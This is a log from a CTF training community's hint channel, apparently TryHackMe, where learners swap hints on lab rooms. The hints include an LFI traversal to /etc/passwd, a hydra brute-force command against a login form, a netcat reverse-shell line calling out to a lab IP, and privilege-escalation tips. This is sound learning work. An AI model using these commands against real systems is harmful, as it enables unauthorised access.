He now seeks help from you, to create the wordlist and remove those extra files in his directory. You being a pro in linux, show him how it's done in one liner way.

Use the following flags in ASCII order:

Take argument as "word"
Verbose
Max number of arguments should be 1 in for each file

that's task 8

oh I'm so sorry

I gave the instructions to arrange the flags in ASCII ORDER.

oh sorry!!

just put them in order... and submit the answer

okay thanks a lot!

np

Any hint on Enpass question 1

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

Im on En-pass, got the first step, but now I am stuck

Could you be more precise about what you tried, what you don't understand etc.

ummmm, trying to frame it without giving anything away

rule13, 😦

yea, exactly

I'm also stuck there

You're not allowed to ask for help or hints yet @uneven bane

my bad, just venting

sometimes it helps 🙂

yeah just don't do it in the channel that is used to ask for hints

Otherwise, by context, it looks like you're asking for a hint

understood, I will take it to general

I'm using the vm available through the website and keep getting an error when trying to initialize metasploit.

tried finding another user to su to but I don't see any available in /etc/passwd

any hints?

You don't need to init msf

It's already done

still giving me issue

You don't need to start the db either

ah i see

thank you

can i dm?

not for en-pass

lol got something which i'm not sure of

sure, but the room is currently under embargo

alright

try harder

hey guys, is there anyone available to help me with the lfi part in the archangel machine?

where are you at?

or not ¯_(ツ)_/¯

Can i dm?

where you are stuck

you can ask here

I figured it out how ti bypass the lfi filter

But dont know what to do next

look up log poisoning

can you climb the tree to ../../../../../../etc/passwd

https://book.hacktricks.xyz/pentesting-web/file-inclusion this'll have some ideas

Im new in here is there a way to team up with someone when you get stuck

Try #689615473620287603 but you have to verify

!docs verify

One second

Thanks

Anyone have a good list of User-Agents that can be used to fuzz user-agent header in Burp Intruder?

Is this for a tryhackme room? @digital bolt

Yes and No, try to fuzz something in ||En-Pass|| room

seclists / Fuzzing / User-Agents

https://github.com/danielmiessler/SecLists

Thanks

Stuck at a point in room enpass , anyone available for dm?

still not 72 hours since release

When was it released 😅

#announcements yesterday

Ahhh ok ...gotta hustle myself I guess😅

hi. did anyone manage to gain a reverse shell in the room what the shell on the windows machine using powershell? i got a php backdoor going, commands are working fine, it just wont connect back to me. could anyone point me in the right direction?

show us what you're doing, you can surround your screenshots/commands with spoiler tags (double | pipe)

i've gotten to the point where i'm able to send commands and receive output like this:

although trying to get a reverse shell using powershell i get nothing back, the server does something and a blank page appears. i've also tried running netcat directly on the machine and connecting to mine - this way i get a connection - however i'm not able to interact with anything

can you screenshot your actual connection attempt, what are you running and what messages if any do you get

this is what im getting when running netcat on the windows machine directly via rdp

however, if im trying to connect via the backdoor using one of many powershell oneliners or even netcat i get nothing back

but it's weird that i cant even interact with it while running netcat directly via rdp...

anybody knows a good resource to locate windows privesc exploits? For exmple for MS10-059 I am finding nothing but metasploit ...

and what are you using on the windows side?

to get the connection: nc.exe 10.14.7.87 443 –e cmd.exe or powershell.exe

that should work I think

yet it doesn't... i can even see on the windows powershell window what i type into my machine

but nothing happens, it's as if the shell isn't interactive

sorry, i don't know - perhaps try using msfvenom to make a windows x64 shell and use that?

np - it's just that the challenge is to gain a reverse shell using a webshell + powershell

i was just wondering if something is broken on my side or if it just doesn't work

well there must be something wrong, but I'm afraid I can't see it. afaik that should work

try to define the actual location of the powershell.exe file, I think if you don't use a file path it uses the current directory

well that would explain the behavior you're seeing, just echoing commands from one side to the other, with no shell spawned to pick them up and do anything with them

it's a new one on me though

ok I'm confused doesn't he need to upload a web shell then use powershell's version of the curl cmdlet to get the revers connection?

still nothing

yes kinda, but the issue is that i cant even get a shell when doing it manually via RDP - let alone powershell via cmd in the webshell

just curious have you tried Invoke-WebRequest in powershell instead of nc.exe

I'm a beginner so just asking not suggesting

room is still under embargo

oh sorry

you are not the only one stuck in that room 😕

I’ll give it a shot later. Im taking a break rn

not by a long shot I'm stuck tooo

I know the feeling partner

i was able to get it working; however not with the method they ask us to. i've uploaded a php backdoor and then made a reverse tcp shell using msfvenom and then executed it through the backdoor

@warm nest Not yet

ok need help has it been 72 hours since linux modules has been released

having trouble with task 6 question 2 i have a command that produces the correct output but is no where near the correct answer my ? is can some one point me to a resource that will explain the command the room author is looking for.

there are 2 options/flags/switches that are not needed for the command to work and I don't know how I would go about finding them

need a sanity check for Mnemonic. got the||image file|| and have downloaded the ||mnemonic tool off of github||but ive been looking absolutely everywhere and cannot seem to find any info to help me use this tool or even understand the decryption process. stuff on this is pretty barren on the internet. anyone have a resource they have that can help me understand this type of stenography or push me in the right direction?

nvm i think i figured it out

Need help with agent-sudo room, running hydra to crack ftp using rockyou. But its been 200 words and still the password hasn't been found. Do I need to wait, or am I doing something wrong?

200 words is not very much when you are trying to brute force something lol. I can confirm the password is in rockyou.txt . Keep going 🙂 @shell crown

@shell crown It's actually between lines 200 and 300 if that helps 😉

(assuming we are using the same version of rockyou.txt ...

Yeah. That's true. But this says its a ctf themed box. so I thought it would be in the first 100 words. I am on a very slow connection so it's taking a lot of time.

@shell crown It's not far after line 200 in rockyou, just checked 🙂

Yup. Got it😅

ok maybe i didnt figure it out what is the awk command for new line i know the \n part but what comes before that?

can anyone help me with this hydra syntax ?

hydra -l username -P log1.txt 10.10.10.10/animalmail http-post-form "/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1"

this is returning an error

ahh... figured it out

Good :). Add this to your bookmarks as it will def come in handy in the future: https://github.com/frizb/Hydra-Cheatsheet

thank you... i need to explain to my brain that i need to search for "tool -cheatsheet" for better results

To be honest if you look at it it's just a substitution cipher, if you've got the tool, you should have the list of what value translates to plaintext ||the import at the beginning is the name of the substitution key on Mnemonic github page. Those values are then further transformed using rgb values from the image, but....||. I just used an online tool to find the largest common factor of all the values in the cipher text and didn't use the Mnemonic script at all

Did you ever get help? I'm stuck as well.

Did you ever get the answer? Those extra 6 characters are killing me.

which VMs on THM are goof for ejpt preparation

Hey can anyone provide me a hint on mission25 flag in room Linux Agency... I am kinda stuck

The room creator explained it either on here or the help. Simply if you read the hint, it says to put something first. || It's a blank one of those, so one of the 6 characters is a space||

hi, did someone can help me on Enpass room? I already got the id_rsa and password

@severe jungle Please check the pins re: Enpass

can i dm you?

Not if its about Enpass.

alright sorry

It's only because it's a new room. Keep at it, and if you are still stuck tomorrow after 7pm, Then you are welcome to ask for help 🙂

Permission denied (publickey) error for ssh in enpass room is normal or i am doing wrong?

neither confirm nor deny, room is under embargo until tomorrow evening GMT

@still dust Please see the Pins in this channel 🙂

Yeah read the hint and think of a bash one-liner, separating commands with semicolon

read up on ssh and then you will know what is wrong

Hi everyone,
I'm stuck at the privilege escalation to root in "Sustah" room
Any small hint?

you don't have sudo, but it's something similar

linpeas spots it

Linpeas didn't spot anything interesting

did for me

my friend told me as you said too

||[+] Checking doas.conf
permit nopass kiran as root cmd rsync||

||/etc/doas.conf: No such file or directory||

is it meant to be there?

yes I googled that

hmm, that's odd

try the command

if that doesn't work, then terminate and redeploy the box and try again

if that still doesn't work then #room-bugs

Thanks ❤️

unless the room changed that was the intended path

same problem, so it might be a bug

it is not a bug.The conf file is in different location.

ah not a default location though

find it then

anyone?

dm

still need help on linux modules task 6 ?1 how do I insert a new line in awk I know the /n but what comes before the /n

Do you still need help @magic bone ?

Hi Guys and Gals, I'm currently working through the room Internal on the offensive learning path and ive hit a dead end i have managed to || get a reverse shell through word press, i've run Linpeas and linenum and found DB creds for phpmyadmin, i (think) i have dumped what i can from the DB and found a sha256 token that i can't crack and a hash containing the WP password. || im still pretty new to this and can assume i have missed something in the || linpeas/linenum results|| I have made a promise to my self to try not to use the write ups so if some one could give me a little nudge in the right direction for gaining user access i'd be really greatful 😄 Happy hunting 😉

db creds don't seem to be helpful

keep sniffing around the filesystem

you got a reverse shell, this is good

ok thanks

@ripe hedge thank you! i have tried the usual ||/var/backups and checking to see if i can write/read to passwd or shadow|| i will go back to the drawingboard (or filesystem 😉 ) and keep digging

good hunting

you changed it , right?

||because it was in the default location in the writeups||

was default when I did it

Can someone help me with hydra in #room-help pls

still? I dont think anyone provided me with the hint? if someone did i guess i missed it

yeah I told you to dm me haha

Please don't do that. Just ask and wait.

@ripe hedge got it! thank you 😄

@bronze fox Your home dir is not /home

/home is the home dir but not your home dir

awesome

You don't need a /n the records are already on new lines

great help thanks @stuck fractal

@ripe hedge and root! 3 days (with work inbetween) it def earned the red level!

gj

@ripe hedge thanks :D, felt like a proper achievement. ive moved on to the buffer overflow section, the first room states its not to teach you the basics but for OSCP prep - do you have any recommendations on rooms for complete beginners with buffer overflow?

there's binex

https://tryhackme.com/room/bof1 this one too

cheers, they will be my next ones before continuing the path 😄

https://tryhackme.com/room/introtox8664 this is a pre-req

so in this order would be best? intro to x86-64 > bof1 > binex

bof1 is still really hard for a first BOF, I paradoxally found the OSCP prep much easier, maybe because you have tools that almost make all the work for you? For bof1 you'll have to write a bit of c or asm. Also you might want to check the computerphile video on the subject, I didn't find better explanation (for me) @pulsar flame

@pale pasture Cheers!! i'll check out the vid now. was just about to start https://tryhackme.com/room/introtox8664 😆

Do not provide or ask for help or hints for both Investigating Windows 2.0/3.x rooms until 15th Feb, 7pm (GMT)

Can I ask hints for enpass now??

Guys it says the 13th in pins

It's 13th today right

12th

GMT

7pm

Ohk

It's the 12th @ 9pm rn

true, didnt see, soz

Are we allowed to ask for Enpass ?

Nope

How did you do it? im missing the hyphens in the command ||awk 'BEGIN{---- -- OFS=":"} {print $1,$4}' awk.txt|| (used hyphens because using asterisks bolds the text. I already have the "correct" output

it's not a new line it's acually a space so you need to use||FS" "; OFS=|| credit to @lament forge for figuring that out

Thanks!! ofc! how did I not see it lol

u were close , just think what u want to change, and what are you gonna replace

can i get some sort of hint . whats the encryption here

Room, task, question?

@stuck fractal golden eye , task 1 , 4th quest

It's not encryption, do you want a hint or just the type of encoding?

The type of Encoding !

https://www.w3schools.com/html/html_entities.asp

oh this uh , smh . THANKS 🙂

no not yet i moved to the next task till i find something

There is a cunningly named 'Buffer Overflow' box that precedes the OSCP Prep one. The hardest part of the OSCP prep box is getting going on it, tbh. By the time you've gone through it for the 10th time you'll be flying. It's a grind, but worth it to get the concept fixed in your head.

ran into the same problem

haha I gave hint not very long ago, look for messages from me

uggh semi colon.....

this is why I use python

Do not provide or ask for help or hints for Inferno room until 15th Feb, 7pm (GMT)

Good evening. I did ask this in the room-help channel but maybe it is better to ask it here. I'm doing Overpass 3 and I'm on PE for the second user. I've seen the vulnerability, but for some reason i can't mount the <thing> since i am getting an error: mount.nfs: requested NFS version or transport protocol is not supported. I can't also get the showmount -e to work since I am also getting an error: clnt_create: RPC: Program not registered.

Did anyone experienced this? Is it something on the machine or the way I am doing the tunnel?

It's ||NFSv4|| so you don't need showmount

IDK how you're trying to mount it, but the fact above tells you more about how to mount it

Also, if you asked in #room-help then I'd recommend checking the writeups. That channel requires you to have checked the writeups first.

Well i did see the path in the enumeration, the showmount was to make sure i could access the mount points, but i keep getting the version or transport protocol not supported. Maybe i need an extra flag in order to restrict tcp traffic or set the version to 4. Regarding the #room-help, i've deleted the request 🙂

showmount uses RPC

v4 doesn't use RPC at all

If you haven't forwarded RPC too, showmount won't work

maybe i am not setting the forwarding correctly, gonna check it out again (and drop the showmount)

thank you vm

I experienced the same problem I think it has something to do with the way you forward the port that the remote share is listening on ?

my issue was resolved by switching from my desktop to my laptop "i don't know why or how"

anybody working on Inferno?

This part right here ----> The machine is designed to be real-life and is perfect for newbies starting out in penetration testing

really?

My bad! lol... Can I now?

Room: Physical Security Intro , section: hardware bypassing, ques: What item can be used to widen the gaps between doors and door frames or between double doors to allow for other bypass tools to be used? This tool is also common for automobile entry. I didn't find any relevant answer anyone who have done this need your help. #room-help

Guys Can anyone help me with Priv Esc...I got the username and got into the shell but idk how to get to root in Enpass Room....Can anyone suggest me something? or any room that i need to go through first

sorry to disturb you guys i am working on Binex machine a Bof machine

and i need a little help. I successfully find out the offset

also return address but the i don't know what wrong

Yeah sure

At last I finished En-Pass

😩

Boommm!!!!! Binex is done.

Congrats

En-pass-ed 😭❤️

Any help appreciated to better understand the task #28 on https://tryhackme.com/room/investigatingwindows3 🙂 I don't understand the following question 👀

What is the name of the last module within this event which had a successful result?

Well in my case i fixed it by just mapping root instead of the path defined in the exports.

You'll have to wait. Read the pins on room hint/help embargoes.

Hey would be nice if someone could hint me about task 6 = awk
in room linuxmodules
I try with :
awk 'BEGIN{OFS=":"} {print $1,$4}' awk.txt
but seems it is not the right answer there